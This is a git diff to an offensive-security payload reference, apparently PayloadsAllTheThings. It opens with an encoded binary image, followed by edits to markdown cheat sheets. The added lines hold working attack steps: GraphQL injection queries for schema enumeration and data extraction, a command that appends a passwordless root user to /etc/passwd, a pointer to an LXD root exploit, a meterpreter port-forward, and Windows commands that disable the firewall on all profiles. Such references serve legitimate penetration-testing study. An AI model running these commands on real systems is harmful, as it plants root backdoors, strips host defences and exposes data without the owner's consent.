z(SO$9F`>90GP>mC8Ck5Su3blU%BZUgwqNpU?d(j;pED0HY}5iazox&~g$MCP6e1!h
zCkL}T)%Ak^)|2Q}WP4G&!7S+edSHYhxjYJ}-+lG&Hi(-enA_XNAg^(HA9vn4JFB7U
z^zq>}s{6MQ=YZnW>99e;Q&k-mXVHiS+LBw?un1#VKv!lqH`|axGt4~S{5o!ZNdVZ6
z*ma)N5V6@X{sR<Em&LeDkkgI8+x*r_^xY)S=x9rK!oGL1s-}kH^bLo_QB1bHb%mHO
zfgT6q7>pWjo8O|4C@Yh-oc2po63^e<djmZa`30gDYows`z5<*a$LoAAJp9@5VWV=2
zQm*S-v1rr<hxHUdjH^($-Wj$1+ww8dNX|YGG@#S+4Cftxgzgd?74;K!{OH7K2EJ<v
zj;arIsP6LOCMaT8nB4ZLpks%Qo~g$*!yZA8eTYKhxyO9t#{0Unon+ODwO-JlN}Sd?
z>3Kd!MFk0oh_H_WUAN}4o2S}c5@;<kWP}rP*&iAK94wCTJUy`QedY|a{obUYZ#7=*
zJMNv>iG<)cfrwxcx&(_DOvs%o%>3`BfrFVo3rq|?8v(H0@87;{tWq+6L(6T&FqHV2
z(V)?vp9nmr&jMavn&8Z%k&-rnK1Pi6J;0=i+6)Q|L|SMtg@Tkxtf#$T5Fn(ok`tz^
zkf;S*d5%*ZAiW?&F*3^3uG7%w!qfvV2LI7xQqmNMb^IT|2Va6dfK-9Tq~h5=fb`a%
z5rm{a7*kV803R`lh(h{Jo-i{%cr!4-!l3a=Z@EvmJM`}q`pYsBf2+^(xkJIk&*EX}
zB7qSVXu7-Xc6$RzI%L&tc0mDuiyJ2HmU<{4%*CCY?tvIQoM=)GTq+pOuOG&u0c-Vq
zB=td#ib8V*H&e^aG_FJ-vR%l~aF@h*ZDRv;6IO2SYUCJbzY{n2D3s;qW-s%(#YK_c
zr111iW0t(P2}=1&SdWH+V2Bz-6<~I^fCOhcZ%z>kcqM?*Jv%cqwf5=Xy%?vqRCopX
zpf<o<z+DiL-(C}7fs;k^yK`~26pPF6!37=TF;y0=b^X3IVqGMRxEn}w2NKmnx5g9j
zB1GBPutK3zKQIOs$*`gWlnNZWC8X<qwDn!oG&d&)WJ|ad1)As*jocx)<KgEr=-v3n
z#yBW2$kYz+Y=t@fR%F0&+s#w7GW@Mv42{?V4uYAxZSC#xT$B_P@@hGNb~eB?X>eGX
zHI6j63Nm=?j@`5Nc53pcPahCH+wwlY4#rb6hybhWX%rwCH&4|I*j${w7a2!RMFW-v
zb0f+S*g3eGkStM#s6I_bwdv{PFJIPNyHE7&V`{42zyL$UM;pHsLH`Qzv%fW9cBdbC
zkA-(ZZBb5++Hnm`lwt6zoHrs`6%-T|0rcO7&fN$FYje4uOu?1PAHohMI|#Y$qM)C?
z1yA+<g9lesL@jrBc8+KKJt1qTIT5C8_%LM;UR8Ke5z+{FB`*G@s0aldd_)yKetA9-
z?Q^)zWMu^pIh2_-gbz|jR!$Bu8W$K|gW-tQ(a{eR6MQhSAq6H34E%rs1eA~l%;9?|
zV7zzs3XqU;Rq-Yz5nD{v#qBOJA_vtWJHelVFtLHyy?V`Y!lvbyTk$A?;lJ6*bs3lf
zG|a9o%FEL@uBp@L4JE2Y<~H1J0$M0cWP?LP9ZXD=RyJN`i-q8{ZnEG&TDMRhuc4y7
zHVeE01E$KzoK14KN?~C^8#e8M!qg197B$rm5G7-$&#mz1zEA34#bz3x$4`tE4_ClM
zIP%5_Gc$b3NTm2@2N!GyHs{r0#B#&g4lS^#U~n9H+#Z)2PY3z?@4tA$*iaP(Y9Of7
zFbDQUxsZz3<+qnZ4T>QNL^^W90VEM(7*JnbZS8ygpGrPw!h*N)Dn1fTI|o@&K~VWa
zF<-s_)5|9PdKdeJl>~LJ(*L?>Kxlp|d&^b$;+NA6EJ1(c@msWb#Eis!0s?dA;lB+L
z7(V+aw2`=5se&eSUk(D<X=xGZ>GLAS;mZMq$niRu+8om9E*iD?u9Nju&RPnLxv$;b
zkIHMjHm3e>ef8g%YCz9(fX|~-%zqKVt$qdtYza{sroV@}Kf4p2s`UTdX#dwORch>b
zJ%j2tnhEPRr>%%im6Gy2_P=*g!9b+$*x2+M3=!<?*wqqz`}Xbg;K~>q)jz1fa1&v`
z1v)fHR3Zec4m{vrTgDKH=Px!DO1z@w*ft5S?XHP+{^Kf8knqIk{l#QiUi^xb!^fCk
zQDz$#WdSdJZbaYVf2IdmZE@-N!l^RXmZ$SaS6I-|krj!^flbXk&Oc4TL7Kx5c?$zD
z_sS+e7-P|G@tc|7Q{ORVX_-uZRH~E5J1TKajFDs10&6+js8`?XVFTfhXFi&7$FdJl
zn02MeFU8vCMrw913+$gB%kWS<sHoIL_j%B>7*ACgLmlz2uyw**jTIHC71aY&u0+f9
z^yaQ>WD_?1&8+&*EQST}=R{<@(aj!p5v+VKJf`d*ayhY=A4kXN*K@6>oqLjqa4h<p
z`!9cfu{6<z1VaJwCWNvXh1<}m#w|xSJ8#<gu%bJ^kzclH)qQ_HCNA1=$SD5j!1~`{
z@ihrWjnplo{Kn7E4>*J4(=DI!gp{n=$_L}kJJT$~!I-RJd9=FISYARmO{w$Ce%F)x
zk70N#<$m61`Ajq_{WkythIO3H*b}8kOrD_iHRfXD<OiOM4WW2=<-Jr@Rx@qt786c>
zZr)IT@-b!VV6yIKLJ!9noxMS=ysAj5RyP?#`Iy$xzl-=awEUxpjLqz5M~j5`()u=o
z+M|}2UJ?oJt89Es%^@k)i&$%Ei{H&P{#bhV>L@qxXuaqw(Rf$)lhAW`I%S<E*oJ@F
z_l4Exe_$&1xnc3EEARdR#)Ns>uD@UMf1bAfA5{APb{F8^WBeZ>?%42}1&kHLfW){Z
zn6p08ndaS-|H;57`8+Iy*w{wS_0pLwBO@b5sz<cd2^}m~U+Z2UvLD6m9(MfTN?CBJ
zd}T_)?v^We?BOh0hZ7!!k(Ii<?`04-+L1c{X=IM&3A##ri?<&7p7*n`&xX}>qiSFB
zcoPlNd(B-5#mgr}{_ckZ1M=G*J-YE6dPlwEe*<@Z-o{&^GMYI%mi07wi%i*?GW%<K
zUhUl6lkW!(Mw1%a_r56DA7%=Z^OL-(EfqK2UC+KVn{?1NC@icuWj&4`Y{M}k<XWCV
z;ZOZHb_y`_<Ix0LZre)0^xxf&N*0uvU6RU->~E8X->#KbQ%W1*AJ5ztC^N$yAN+7j
z0KGVSNHV}qslwYR_+}Er@O+i>8xd80KB1t6{Q~-DLVuInHriz00M`O*HU>htP-<Uq
zdr=Pcj6UqS47;_|q0!4IR#Rb0nh@;Ni-_E^A!XGc^sM6+BpaF8;~D>|PaubwUsL@3
z)1#x`tE=Xm51jgQqVQ)T?u;97{8a8XZai$#d&_wkySsNHCr!Wi^qaEa8~^xufzieX
zGHE5XYX8>H&XT7*9=6X;h-*MQZQ{ql!uB16BZ0JXgu0PP##Lo{m-E8;luBtq6&&=!
zjbVAitAgd_mMKle_`m-X)6)Nm!R4Q076!j$86^)4HgH-!oPK`YJgFVaJ7vxe6dj3v
zty|Wop1CloI@M9*Xz%H2=6SoR)2;|*M3jq_VE|850e8lu;kM7jKMk`#I~x>H1K)p9
zEFbZ-@4xo~{QnTV|LeYk2wmB*>a2K!Y3nPm(5C~KRSWYZ(5GJwWzR0|E2{{b9f?F-
z8;<lmY*Gp-XO6jpbwk37)bh8|0IF5SGUM&7Mq_#{>NcC|(bH-qSXQPL^AkqMJKKH{
z-C;Y^4r#DB?P@rEOoM~oBp^e{<%H>XULEBbGcbEGHiwH0tNw$6BLl9pXbovYyenBu
z@BUO<1RJf^eB;9!xy(h`q~P|gOXzgBMK!F2+EkfO-F(?f2oaJD6^G*-m9Be6pcwU}
zF-a8aLW~8y{6VFQJsz|5qx%Qq4AY4P3Kg!dnMp;;cH62EE#=lYHY|hqBmM#e0j{}k
zHahKG&k&g33u(ypgo#&Ljr{ev|0lIHr?fga4I?m5o>6OZzP`}(E18JWeY{$6jr_E5
zY4%ON!dkCmR%4VE!4LPfTPq{$Pb{}M(A@1%sLq+<_C6)1J6wj=wS|3T_QJ@1K){?q
zu(na?Awl^mrStCj>uR&tt|r^+V<hK?jjdz-VJTwRR9?G;*|LaN2j?+eh(lfGPbgXZ
z>f+x&O_HB_Nw{@M=Xg;&QDMXSrn1(|M(Vo9SkdasF&YPI-<w}9y?|OB?da^GA=Fr)
zRuY4{vxzq~ac=rxK@l6V-uO)M#l+x+K||JD!;DpjonZO<UzukvoA*ettr-+!Zo1`+
z?tUV9&v?@g3apWrLVDh=ldP@BTY=5*_%5FDIGp=VM)EH+1dDP1Qx7aXEQQw#NPp+2
zpd6h$-j7GYLF`A1-dzc|VfCU-ZP)gAshZ^2Cc|~OOUbvY<ZwwWaxi(bI0`{Ho_*(?
zcfzaR{%JpsJ?Ub^S8v`Zuf!s4vre6#+&yaKzjcUs*Js^PR4Z^k7UUv8{2`-RsK?Vb
zUBohV{`~GIJDP$|`X=I|PurvFc4=QAzGEi26Yz%#ziW5%GMFX^I_-YpyENrDl3-J^
zd3L)ihEm`3&k_={YlIa1G5B>g{Sl&_nibi&6)>KDjaNzPV%ynyD3id(RFR4Gzzbh*
zHMowS_4_p$oJT12SJ^stYH!wFW#Z}j0HGLjxsVn1y{dmu+ehuju1L+cd4rgk8QD4e
zb+?>tTg86b=Yqb;ej4?oDJp*cCdGAA(YE0|miuy}c1m;HPtj0%YhTK`nprBH@;!Lp
zAs^J1cRvTK^Q#_FNFI-B@O0<3Cb5uJ6(Z>eNebT<dCMev-Q852pZ&rqFT{!#y@O&C
zxF>|Q{BEr6b|%~<Nyf*tq%=0Et>|&P=iHM@)seUy5ktIW)nxc7S&r3%f>2OiTtKYp
z@VJ3%|KRFV_KnILX*)ml#5rF(*4;|JG4du7f3xig^B00Feq|$0Z1dj--WyP2z6~ws
zT$mq@DKJ7@7=E4JxwWUTJM3UhDa0MAWRN;wLi&fXQ8Qxrf3Lw5C|Z{i9~0SVAY<Po
zDBaLb&icJy?}j+tMB6|?!F+=Jy#QW0mxmc5`6tttpJi1W3z^giLo>)^Pt_ysqJ!{*
zv6)nvzC`P1vxVcAi<ue^6EH6*aSVr8CTn_0><xMKe6qW!OccpDD?FJNuzwHcd1tW6
zSz>k|W0Sqett>^CF0_=j&Y!f4xbb?Dw4wwXTGrLnnV98aSTxEZB{EWP?tY>3nN)!w
z2<Z6}DC4JDMw1~@mEO$p7HwZ~cXZRUNac6;`2t^kLzMj8^V{1)_kX8Q0&=VM9GOQC
z{XxaN`=bW);Mt5QpveL8yU?qnWas>VGy3bVESHgPm|WFZ4(H3?7BP$NUbe9Ol6MDp
zS^u1;^s3b7yNjtJX6f_?hstNY_PDIHHh60i#|Ly1UmRMB=vM=I{3!L&omxI=z!_8a
z-LSW1kGT`cPRgOmw4j)J+aaUo?E!l+vO6UXJ<_Ipuu>>%MR&U6^1izUJ(ISbo;6MG
zZSFzkgUKl#bX`rhx*Bzv=-X&R!xiuSVvKKOL}O1RDD2%X^J-A>{85aEApEeP5EGuI
zyc@9kn6r=lTXrSR7!yXImed;>R&1XSJLoH)?&d~ujM-r1gyL|hV5y%K3ei2H+*=(i
zjv~l6M5muf?)=T5K+N#<bS6os<Rh~c#-rk6lbUKR=C;>qe-xOZc4Y;Z(kE^u5J~r&
z-yX)qNPE8%f~V3EZ1Qf>CiEcXD8yc;>~+Z>zW9QIVY|O5>8E{b7+NFKXk@ka!`)HY
zYmKYch_$m%3ax3Y;#o{;%lU&l8+6u&lQq>1eB}+kzYV!n-mH=(FlJL$R!X-3XvRG;
z;&0+Nv#R^PjR=bm%xJ!~v@3<nFo^CzKV&&sKL5-yYX0};*Q*61H-GamyjI=h;J+Um
zenIX${^on{sFBc5*Ebl{P19-H&Xik0{V+|3z0qrKg<CB{+`8NI`b_y=^^>p^zl>(z
z?K-VE>QuiG&zVoVH0=pH*S<`2Tux8bi*l+i-X^?ksAdyGu&tbnGd^~Hef_~})StE@
zL<&Nh52N;7xC7k@M;5r!?1hN@<4Vbvxp>n`|E%TMzgAMcuHYb~sUT!^C-5^Bwwha-
zl$%Wa;*Qoq*eeOsNQJ&DE1UMxJz}SwyLG(_QoEhI{9?s2?akYBd?-6wp8^kK!c06}
z7^%rL<{R18$2Av`cnI}DD-)*X51iRkXQs<XccyDmR<ky(_Dfv*GfmJ*ONhCz*{58q
z=N_n+IXd0)-1|#=rW;AlI*RU}x4Su9y)dRVt#V_H=k#^-4SL6El(1}s#2mBaWbH*<
z?9{(&vI$3|7M|8nATbHohjxy?h~yTt$@%X_slPboWq|&F86Ph4muUQb(dWN+KI--T
z_s&PO|GD$=g+#<mq@;Z2+w-aKSYxR5^y1OR=qN*mtFLo;YW2&phV7rLj(VD_*419}
z#5WTb75=%Xo(YsvFf7a%IA-x@@CaKTd3&WiV^x!}d~Q0OW#8~mruFk@eS<MVj;Jvt
z=}rUcghgkJ`HknP%84l$h^)jT?C64_pGgf#eWwj7k5lJrO?hwL)y`n?WcOzn4Nx1k
zuk&dwd~iN6ZOuFPJ>qBf@b&EE;<w^$G=IL-`P5uy*)o51KUd0O8F{^+>a&Rcln&>j
zDr4k~uz`peA>{drZTN%UWSHvo*DHn;Z<jC*)Gxy$%2{QnLm1Gf=}BZ4R0T8K+4C_r
zRv0j?r*1mbafLc-%mxlN3Ka|WO2KNkiA3mb=Rc}rkF>jtjyf$Q-+fzrjb^SvpG(k5
zTherW;a6|>_tW0-h#2N~_#yV3bH_ut9pj5S$>BbSU)HbX3?}H4?Q+hE)sr{M)K49&
z+jcW%)Op_9;PoHma%RQV5rP{VIPOfvi?v^<ezLc`W@g;XPo7<BI&&{CZIF6b^R1^F
z#}tD9kD}JI`=58q-NaWJGV?6&Eo!JY+f{tPo3xkTXpE?f?QP;2d+%7qYRiii>{#N8
z@;GO3=W9}W8@I*d_27}iMd4)3Ns`Yd<L{%^PVur!@6>jFLmXmpFx>vOs$KF4D)Qzq
z20vbp_m8&bSYEEfZEVW3lsISFCzHh#n+|d(yd)c~T0O3H?|biMPZk#<*uDt#zdX@n
zY?bghb5vIzQ0d1cc_gJ)ICpxLXC<h98P#K9@Teb)-eu#EWxtnxjeph!Wfa5B)y*77
zKbBo~i-06(Iyhh4vM`ioBixAZ&|URFYdSiqmq0;;-crxqaqsBn8t-SWE-LA}frD46
zpJl#walgwxH<jK|>Q`Z?y-zb&#e`x1mMF3<u)6PsgSDtk-<yNB16j|pRRz~!o8^cQ
zTuuCN#<3TyHa(1QA7UkG2a}ie`%gWTR?D25^^h}u^f{eqUk01~T6saxPujq*=^vdG
znd3Qwr?6kxs{L@AN0a+r&Ajx>X4(rsWu3l0@HDwFmByTYsAc-|YU20wVj)NTE78AC
zP+7dV@3fkNQ)}{)<fso{5ap-L^z+GJblgOI_OwfB$59?OZ7y5x$bn~^frBq~4ABd2
z7>bR@ndC)wUwb}Iau^O@`=u*NtIbSv=f+URYL-LcmyLu=vK>`-x{v9Jwx`6y+l+-z
z4&zFTLmhN`O7-EF(Hz%3<xWzX7H(OCyvxrpnn3vSZxLNqed8{~+GkXi1o+^*c{3U9
z8r4^SXM>%Ia;wEclc#4=_u^OCwl|t3)neyatluT(UJMUwE;j97VIWL;c^aYNbfJ!&
ziK7zn{Y#X}sO&f|>7;BXi)+B6$g3muecvh4ERMVqJKue9T4b;m6!>#_nm>xAH=d|U
z==Rv3pvUg>ip~1nb-MU)@j0LBpXG<r6<2D0s-zMHU+7<`ex@FhJV<_e_2cmt-ltOc
zLUC6diww8rRTt}D!@E!N@z}I#Z}g^yM{)Fs<ljBWuC(1SqM6J!RjcyZd*4#yO`@VD
z+~%$Hdg}zO!=u!ekq|Zht)AR-SvO_9=X(JX{o8+nJM%tzoigz#4?P!px+RBxU|-5?
zn7-#~;$ln-SyJzXGdd}4I%#Ndxh;vmWVs@3714T<%j)(S>md^kk4d#PXW*nSHQD>+
zhF=_h%~Ck8i@YcoJ$NY;W98%=sTT>=2kiV;EM?yn4$ajSu$huzhCq__-FttFP9We^
zTXc_TLxbS`W|EBSDq+H|xJlKY7XGl6LfF2Ga+1hS@wUO!?47(6*eTDcDDuJSZTt&U
zR%-nLYV)dught8K?J;`Xra6LGmnFy43yL5LcPr@0M+ed$3|yw-?x9dVRNML$z2UoG
zk$un4D2|!hW_R=+O+5R%@LxgUSAJHkx?JO_md277&zszD4U(cRE-966CE?hb*lZ=}
z8&xGR6#o!i<CG|~s)*e!*<$AReo!uZwQqE3HSzxBei~as#jm@|TNbRzoH-7@4ps?k
zUya_@8l~^AOslqH2OGL3aOPPzAJo5Mp3%53@i1Wo?L$6_H`#8A?ZY}|pStM5KC{{_
zt;R=hek>6!6Ul0D#-#m{tlIp8z+K>T#BLq;dUv`Jo~|`!Z#v$1_BhEMT;G+exgUOx
z3PW}e_pj(E-O9`I3y>ZkU~Ed&xjvNcNEzWI{9rvy+2(6SV9d>fkLQ`Jr+gy$w+Bwf
z8Gm?Lyeyoq_2wsRwW4%Xy0S<|kV4;mEpT5svp-u;y!3OW(AH)CoqST?cEcAKdkv{J
zWp88d)~SS8+EK<t{7gr7g!aXh<Jj7*Gc&fp{LSRZy>UNXym(Z~_j?HcRHf@o@9LAW
zw#P=Tr_X8B<Z;QeWYxU6@eV^$w&Uq>FTUx=EW7j<o(b`rKecanDT*)Z{n4bhL0-0h
z^qpeL)l&nLj}xRtLWKMiydImqydHxu@mr`4C`uc5n2!bGsZSHbm^=Tk0ILR6`I-QT
z#zHKe<)SNUFz%5i#x84O!x7sn;>BXgaFmS)B9vvA*-#N-XI(5A_6Bs^b_M%4uT5qX
zWT%;E@b`Y<FUvId`q>-M$#a^z7nlmuPwpv6on3@=bUL=PGRgVtWV+sN#OPGfydlha
z_SiB#U@3I;DQn6|!8*!C#(iUGn7yexDN<{LSjze)LW;vo-b>SHTe_F3!dEdOI+h{_
zrgUr4I^)q>A~amSiL6H_Ff?*Cx&J+x`itI2Z|RwTy)8<^tPjXsG9KI1tX}2KdG?<B
zxi&O!Xh5<4>QvG!=$$I&A_t|lmth^@Liekfk|a0-E$4r(vd<QYc<oFy)`?=_EzLyt
z`Eg!b(r;TkSJqHB`E9Dp)=@L&?*JHwpM*);*>B%d&7c~1?j4PiYQ{OQ1SQ2pcz0X!
z!f}qL)&?=c8r7%0PIcKjs>{|9`KklW7e3~3Ib3gl=d}<*h?C1Hv8>SG*BM_ByMM?Z
zTg|QS(7AP02OIw-lhX?<_`?S2i@g}%>@*nSG4aBDH--U^eGuf%wSM;8os}?lR<V^`
z^-(rdMELigxmdF&#LhaE$LCnlbZ8G5gjBFwK+~bAGuD<PnUA`vn(H*t7V6pl&>HNW
zD4fic!~2DGFz4FQ+j<g8tu_AsX2q<aw?t6uyRe?-#8Tuyt?Ik20>E*8F2$c-6sxng
zi;gGv$5z^s)EQ5-A^>Iu=QTqBNWH8O#cn3NqZP+b@-RXg4YN0qHg^cFo6Gx@k0rS7
zZ|;YCC6@7G@#?e=O#=he{Q)e)oUy&jtr4ul`}Xfh11T5%(obYp8);V;54aDB#yVci
z|7<1U?JXQIt?aJfyKNiMiU8@i4#jut#}sb7fRxkS7=D$?^wqITF9T?2e=KEbvA6I?
zK93Yoj^3^iM}Nn&6sKa&woy`bX}@KTWn6%S=d}<*h?B?3y$m@(PizhnQeo|$Fu{ny
zq+%=nuz|y>Fe*2e??1D>t5=y<J`dvy=qO4od3D*8q%o&WA>S2S5x!(p3ST#A=(<6^
z%S4ge#OVbV{_uV$st!+X36keDF)}Cd`;D=A7Hk%U4=Q8H<BCs0eIB!?LFKgHH?i#m
ze}GP_@1k>cEm~s;wK_=CqEE2T%t3KkNEw@sVl#Jt@F=jN=j*ki`}}k~wI8)6h;}GM
z)1pr>=i9NC#kPbvuP>u*>E77aT&V`Zb@dqET=Ea^XhrjdiB<&g-n>1w5}0O5S|^%;
z5z;_6K<&A29qt6ppmS{<7!Z2Ti{=Ys9pQ@Yd!Dxy>nInVyGLS#v{<<#v_D>f5z+|0
zaR{wBjQxm}<9=fa>QtN-QZLG<b?KKF0hP9g_hO%(jXB>=A_FPsf3A|$%L*~Mt$oVJ
z>qES;P83VOV>m;Nx!pJ0luUA$Pa)&iW6}L8io;CGs918?@yvlfZAsM5{+QfW9OvcI
z_UKoj#^%uo>!gf}CHL{>J<;*3BVAZZ(`ftsUWn)zT^hkx>d;#w$2=~O_`DWE2yyZ_
zC02&V<y$EFjhC!66aRCa8=D12=9sy0vV)0_HB;m^@zW8#KWOq{WrW*Sbr4bwM&?*}
z>gx0X#io>4yFbV_KHoxiYEKgV!gU^QS=r9R?{+dG$IMF$JeZTb-7uTr#p~SMzPbaO
zMPX8L-=rX<!v1EBu7A)6=;AR{gVrTq5Z&iTNipF#KbO4cr^bS2g}fK1;k*4~6q^~_
zq@E9+DJdobE2?R^=Q9jd$9850`L9j~OKj|1H<Y0_g*kNb`)Ix}_9<C7ew+uyzPq+<
z>6aL~f%B?jvi~%3Ky|i1wvXmt>;j;ZT3R3aoPxJ!;<zx6yp`wBa_=s@3$|e?w3GYn
z*;q<bQL8!$uB`*W|8!5{R@OQPlP5MWDdXH6EP4%7W(s*PPD63@Y<uZ1maNX~Cnw>Z
zzm>}Dwb;(^khfy$faW4$Io-hj{6TX5GO6FP@%j*Ntdqs!v5s`%y0M&^iEm*ka*+Dd
zqrT=YNju}o`LD@%Z`ekqdo`A_H1b}WhT@9-DN8i(iH?`Q>KvMWzLTn=SHS@L^la?s
z<sR3#Bs#B!5JH?h6vHr1Y=(85@*nc?-tC!;$~7l{un<BBA%qY|I3>182qA<JLI`mz
zBpDV$2qA<JgVqmzn}iTT2qA<J$4XX)g%CmrA;h31$*>SY2qA<Rv?Li8LI@#*5QCN^
r!$Jrlgb-rTl4Mv2A%qY@3|jvWQA4~xhMb3Q00000NkvXXu0mjfApHxx

literal 0
HcmV?d00001

diff --git a/GraphQL Injection/README.md b/GraphQL Injection/README.md
index f7b0a75..cfc73ff 100644
--- a/GraphQL Injection/README.md	
+++ b/GraphQL Injection/README.md	
@@ -4,10 +4,10 @@
 
 ## Exploit
 
-Identify an injection point
+### Identify an injection point
 
-```javascript
-?param={__schema{types{name}}}
+```js
+example.com/graphql?query={__schema{types{name}}}
 ```
 Check if errors are visible
 
@@ -17,7 +17,15 @@ Check if errors are visible
 ?param={thisdefinitelydoesnotexist}
 ```
 
-Enumerate Database Schema with the following GraphQL query
+### Extract data
+
+```js
+example.com/graphql?query={TYPE_1{FIELD_1,FIELD_2}}
+```
+
+![HTB Help - GraphQL injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/GraphQL%20Injection/Images/htb-help.png?raw=true)
+
+### Enumerate Database Schema with the following GraphQL query
 
 ```javascript
 fragment FullType on __Type {
@@ -114,10 +122,9 @@ query IntrospectionQuery {
     }
   }
 }
-
 ```
 
-Enumerate the definition of interesting types using the following GraphQL query, replacing "User" with the chosen type
+### Enumerate the definition of interesting types using the following GraphQL query, replacing "User" with the chosen type
 
 ```javascript
 {__type (name: "User") {name fields{name type{name kind ofType{name kind}}}}}
@@ -127,4 +134,4 @@ Enumerate the definition of interesting types using the following GraphQL query,
 
 * [Introduction to GraphQL](https://graphql.org/learn/)
 * [GraphQL Introspection](https://graphql.org/learn/introspection/)
-
+* [API Hacking GraphQL - @ghostlulz - jun 8, 2019](https://medium.com/@ghostlulzhacks/api-hacking-graphql-7b2866ba1cf2)
diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md
index bcf6af3..dfae6bd 100644
--- a/Methodology and Resources/Linux - Privilege Escalation.md	
+++ b/Methodology and Resources/Linux - Privilege Escalation.md	
@@ -384,6 +384,14 @@ E.g: `hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash`
 
 You can now use the `su` command with `hacker:hacker`
 
+Alternatively you can use the following lines to add a dummy user without a password.    
+WARNING: you might degrade the current security of the machine.
+
+```powershell
+echo 'dummy::0:0::/root:/bin/bash' >>/etc/passwd
+su - dummy
+```
+
 
 ## NFS Root Squashing
 
@@ -526,6 +534,8 @@ lxc start mycontainer
 lxc exec mycontainer /bin/sh
 ```
 
+Alternatively https://github.com/initstring/lxd_root
+
 ## References
 
 - [SUID vs Capabilities - Dec 7, 2017 - Nick Void aka mn3m](https://mn3m.info/posts/suid-vs-capabilities/)
diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md
index 227d80a..a9d182f 100644
--- a/Methodology and Resources/Network Pivoting Techniques.md	
+++ b/Methodology and Resources/Network Pivoting Techniques.md	
@@ -85,6 +85,7 @@ optional arguments:
 
 ```c
 portfwd list
+portfwd add -l 88 -p 88 -r 127.0.0.1
 portfwd add -L 0.0.0.0 -l 445 -r 192.168.57.102 -p 445
 
 or
diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md
index 3975ad9..45e88b8 100644
--- a/Methodology and Resources/Windows - Privilege Escalation.md	
+++ b/Methodology and Resources/Windows - Privilege Escalation.md	
@@ -172,6 +172,13 @@ List firewall's blocked ports
 $f=New-object -comObject HNetCfg.FwPolicy2;$f.rules |  where {$_.action -eq "0"} | select name,applicationname,localports
 ```
 
+Disable firewall
+
+```powershell
+netsh firewall set opmode disable
+netsh advfirewall set allprofiles state off
+```
+
 List all network shares
 
 ```powershell
diff --git a/SAML Injection/README.md b/SAML Injection/README.md
index 928b56e..e244bfd 100644
--- a/SAML Injection/README.md	
+++ b/SAML Injection/README.md	
@@ -161,7 +161,7 @@ The SAML response is accepted by the service provider. Due to the vulnerability,
 
 An XSLT can be carried out by using the `transform` element.
 
-![http://sso-attacks.org/images/4/49/XSLT1.jpg](http://sso-attacks.org/images/4/49/XSLT1.jpg)
+![http://sso-attacks.org/images/4/49/XSLT1.jpg](http://sso-attacks.org/images/4/49/XSLT1.jpg)    
 Picture from [http://sso-attacks.org/XSLT_Attack](http://sso-attacks.org/XSLT_Attack)    
 
 ```xml